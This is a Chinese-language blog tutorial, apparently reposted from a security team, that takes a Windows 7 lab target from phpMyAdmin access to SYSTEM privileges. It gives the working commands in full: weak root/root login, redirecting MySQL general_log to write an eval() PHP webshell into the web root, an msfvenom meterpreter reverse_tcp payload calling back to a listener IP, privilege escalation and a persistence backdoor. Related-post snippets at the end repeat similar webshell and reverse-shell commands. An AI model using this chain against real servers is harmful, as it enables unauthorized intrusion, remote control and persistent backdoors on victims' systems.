msf实战提权windows_phpmyadmin getshell到提权

最新推荐文章于 2022-11-05 19:46:09 发布
最新推荐文章于 2022-11-05 19:46:09 发布
阅读量179 收藏 2
点赞数
文章标签: msf实战提权windows
土拨鼠先生

一. 环境准备:

靶机:win7 32 位。

环境:

php:5.45

MYsql:5.5.53

Apache:2.4s

二. 开始攻击。

访问目标站点,发现开启3306 端口,

经过弱口令,爆破,目录泄露等途径已经获知PhpMyadmin的账号密码是root root

1.开始登陆到目标服务器的PhpMyadmin

a901393eb6b074c2e24b092e70a95ae6.png

2.检测MySQL全局变量(generallog、generallog file)的值。

general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。

general log file 指的是日志的保存路径。

SHOW VARIABLES LIKE 'general%'

8b055fe65adfe2703eff2b2576f1cba2.png

已知general_log默认是关闭的,log日志存放的位置是C:phpMySQLdataSC-201805120002.log

开启generallog 的作用,开启它可以记录用户输入的每条命令,会把其保存在C:phpMySQLdataSC-201805120002.log下的一个log文件中,其实就是我们常说的日志文件。利用的思路是开启generallog之后把generallogfile的值修改为我们网站默认路径下一个自定义的php文件中,然后我们通过log日志进行写入一句话后门到上面去,然后再进一步利用。

set global general_log = "ON";
SET global general_log_file='C:/php/WWW/testshell.php';

10377d67c6fa2f372f7bfb4ca25e31ea.png

7ff14f9f81b4580ebf7176279333370c.png

在网站的根路径下生成了testshell.php的文件夹。

  1. ### 然后执行插入一句话木马。
select'<?php eval($_POST[cmd]);?>';

cbf8e214c719fa6886befd4ad228e260.png

### 这时通过浏览访问一下一句话木马。

850ebb002702a2a482b87192fdf090b7.png

ba56871b783c8f214e0fd5bc013db1d3.png

5.通过蚁剑连接一句话木马。

52d680fe65989111b0cd2b2288932aa7.png

发现现在获取的权限为administrator权限,通过msf下getsystem来进行提权。

  1. ### 生成exe的反弹连接木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4444-f exe >testshell.exe

4ddc3f0c3f808f5dc2dae6f788d15d62.png

将生成的木马通过蚁剑上传到目标服务器并执行。

eb7d0facd7cab0eb1a37950aa125a72c.png

7.开msf监听,

600aefaf67224818cab6b5c361ed68b0.png
  1. ### 建立后门。

生成的后门文件路径:

6e6b74403a7f8563ae5ab2af03c9835c.png

后门加载成功

利用方式:

当用户登录到远程系统时,为我们打开一个Meterpreter会话

777675d77d3f0cb4e541c07632fcb556.png

1.### 连接后门

3d5142cde881a1c5afbc242b9d5f53ea.png

成功。

总结:

1.在获取密码的过程中由于是本地搭建的,所以是知道密码的在实际使用中可以采用爆破的方式获取密码。

2.在获取一句话反弹连接后尝试获取密码失败,后面在msf下获取hash成功获取目标登录密码。

扫描下方二维码学习更多WEB安全知识:

8616905ce6f0cba946335512775bcc55.png

690510b2aead0be87bf2fb92f1d3a90f.png
Ms08067安全实验室

专注于普及网络安全知识。团队已出版《Web安全攻防:渗透测试实战指南》,《内网安全攻防:渗透测试实战指南》,目前在编Python渗透测试,JAVA代码审计和二进制逆向方面的书籍。

团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货,从零开始、以实战落地为主,致力于做一个实用的干货分享型公众号。

官方网站:http://www.ms08067.com

weixin_39603622
关注
【菜鸟腾飞】简单的Getshellwindows提权_漏洞研究
11-01
【菜鸟腾飞】简单的Getshellwindows提权_漏洞研究【菜鸟腾飞】简单的Getshellwindows提权_漏洞研究
phpmyadmin getshell提权
weixin_42035825的博客
03-21 385
环境准备 靶机:win7 32 位。 环境: php:5.45 MYsql:5.5.53 Apache:2.43 开始试验 使用nmap扫描目标机端口及服务情况。 nmap -sV ip a.发现该目标机的3306端口开放,使用namp自带的mysql弱口令脚本进行爆破; nmap -p 3306 --script=mysql-brute ip b.也可以通过目录爆破等方法找到phpmyadm...
php提权windows,[原创]WEB安全第六章提权篇06 windows系统溢出提权
weixin_39597987的博客
03-12 144
WEB安全第六章提权篇06 windows系统溢出提权1、简介window 服务器 常用的是win2003 win2008 win2012在渗透测试中 ,我们获取的权限是iis_user用户组 ,要更高的权限就需要把当前的用户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大范围测试。2、程序权限的对比在iis里面 权限依次的大小对比aspx->php=>aspa...
msf+php脚本提权,MSF自动查找可用提权的EXP
weixin_33167915的博客
04-12 307
Selenium自动化测试框架基础学习(元素表单操作)(Selenium操作Selenium自动化测试框架基础学习(元素表单操作)(Selenium操作) 目录 一、Selenium自动化测试框架 1.1什么是框架? 1.2为什么使用框架? 1.3Selenium-webdriver工作原理 1.4selenium环境搭建(详情查阅讲义) 1.5什么是Selenium-IDE? 1.6IDE功能简...
tomcat系统登录部署漏洞—msf破解及war包部署getshell
Sea_Sand息禅
04-11 1921
跟着大佬学习的,如有问题,欢迎指教。 tomcat是一个很常见的java web application服务器 此次实验漏洞:很多用户在设置后台管理员账号密码的时候用了系统默认的配置,这使登录容易被破解 0x00:环境部署 1、java环境,以便运行xmapp 2、xmapp下载:https://www.apachefriends.org/index.html 3、运行xmapp的tomc...
MySQL提权总结(建议收藏)
xj28555的博客
09-08 760
原文地址:https://www.cnblogs.com/sfsec/p/15241860.html 前言 数据库权限 在平常的渗透提权中,我们通常可以在一些特殊情况下得到数据库的用户名和密码(最高权限root),如下: MySQL 3306 端口弱口令爆破 sqlmap 注入的 --sql-shell 模式 网站的数据库配置文件中拿到明文密码信息 CVE-2012-2122 等这类漏洞直接拿下 MySQL 权限 口令爆破、sqlmap的--sql-shell模式和数据库配置文件中拿明文密码已经
PhPmyadmin提权之FILE权限修改
weixin_67803112的博客
11-05 594
每一次渗透都是在开盲盒,永远不知道下一个难点在哪里……需要我们一次次尝试,一次次失败,一次次总结,才会把我们所谓的难点变成基操…..
phpmyadminmysql返回_phpMyAdmin利用小结
weixin_28981373的博客
01-28 404
获取版本信息在phpmyadmin根目录下后面添加:READMEChangeLogdoc/html/index.htmlChangechangelog.phpreadme.phpDocumetation.htmlDocumetation.txttranslators.html在fofa上搜索相应站点进行测试:常规getshell手段:1、SQL注入:看看网站是否存在注入利用注入出来的账号密码登录2...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5616
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
热门推荐
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
Windows低权限下利用服务进行提权
大方子
09-01 4211
先介绍下一个工具----------&gt;AccessChk AccessChk是Sysinternals中的小工具,推荐用3.0版本的,新版存在一些bug。 利用这个工具用来检查用户和用户组对文件,目录,注册表项,全局对象和系统服务的权限,在实际配置权限过程中,如果权限设置不当,那么win服务就可能被用于提权   AccessChk的具体介绍可以看这:http://blog.51cto...
phpmyadmin后台4种拿shell方法及php爆路径收集
weixin_30367873的博客
08-31 1224
php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SE...
如何快速收getshell
WM_NNXX的博客
08-02 940
转载: https://mp.weixin.qq.com/s?__biz=MzI5MDU1NDk2MA==&mid=2247486770&idx=1&sn=7f819a7f31b4a660e11a95d519f92145&chksm=ec1f580ddb68d11b4c8e6286136c5afa879a23c6a6465f12918776cf3f23568924b...
使用metasploit(MSF)对windows的ms12-020漏洞进行利用的过程
D-river博客
11-10 1万+
前言攻击者向受影响的系统发送一系列特制 RDP 数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码。默认情况下,任何 Windows 操作系统都未启用远程桌面协议 (RDP,默认端口3389)。没有启用 RDP 的系统不受威胁。此实验对目标系统造成了DOS攻击。 0x01 实验环境攻击机:kali linux ip:192.168.8.130 目标机:windows server 200
[内网渗透]msfconsole提权
purvispanwu的博客
03-17 1348
1.环境准备 kali虚拟机 IP:192.168.112.66 靶机 win7 SP1 IP:192.168.112.145 2.生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.66 lport=4444 -f exe -o /tmp/purvis.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为192.168.112.66
【工具使用】——MSF使用_使用MSF抓取用户密码
weixin_45588247的博客
08-08 7266
一、抓取自动登录的密码:   很多用户习惯将计算机设置自动登录,可以使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码。   点击进入:开启windows用户自动登陆的方法! 命令: run windows/gather/credentials/windows_autologin 二、导出密码哈希: 1. run hashdump命令:   hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限
Metasploit(msf)系列-利用快捷方式漏洞进行渗透提权
chaojixiaojingang
09-26 3313
原理:        利用WinXP、Windows2000、Windows2003、Windows Vista等系统存在的漏洞:Windows Shell中的漏洞可能允许远程执行代码,如果显示特制的快捷方式图标,则可能允许远程执行代码,成功利用此漏洞的攻击者拥有与本地用户相同的用户权限。 准备: 靶    机:VMware下的WinXP系统  IP:192.168.1.111 攻击主机:...
windows php提高权限,权限提升
weixin_32921593的博客
03-22 494
首先上传一个webshell网站上查看里面的内容,以及shell功能。由于这个shell本身自带的cmd命令不能运行,而且上传cmd不成功有新建文件的功能然后上传一个aspx的马,这个木马的权限。比asp的权限高。但是前提你必须要知道,那个目录有可读可写可执行的权限。进入aspx的木马中。发现这个马中的cmd也没有权限。那就上传一个cmd。然后在asp马上执行,一下systeminfo>C:...
msf linux提权
最新发布
09-17
在进行kali对linux的渗透攻击时,可以利用MSF进行提权操作。有几种方法可以实现这个目标。 首先,可以利用MSF本身存在的后门漏洞进行攻击。这样可以获得对linux系统的访问权限,并进一步提权。 其次,可以使用攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值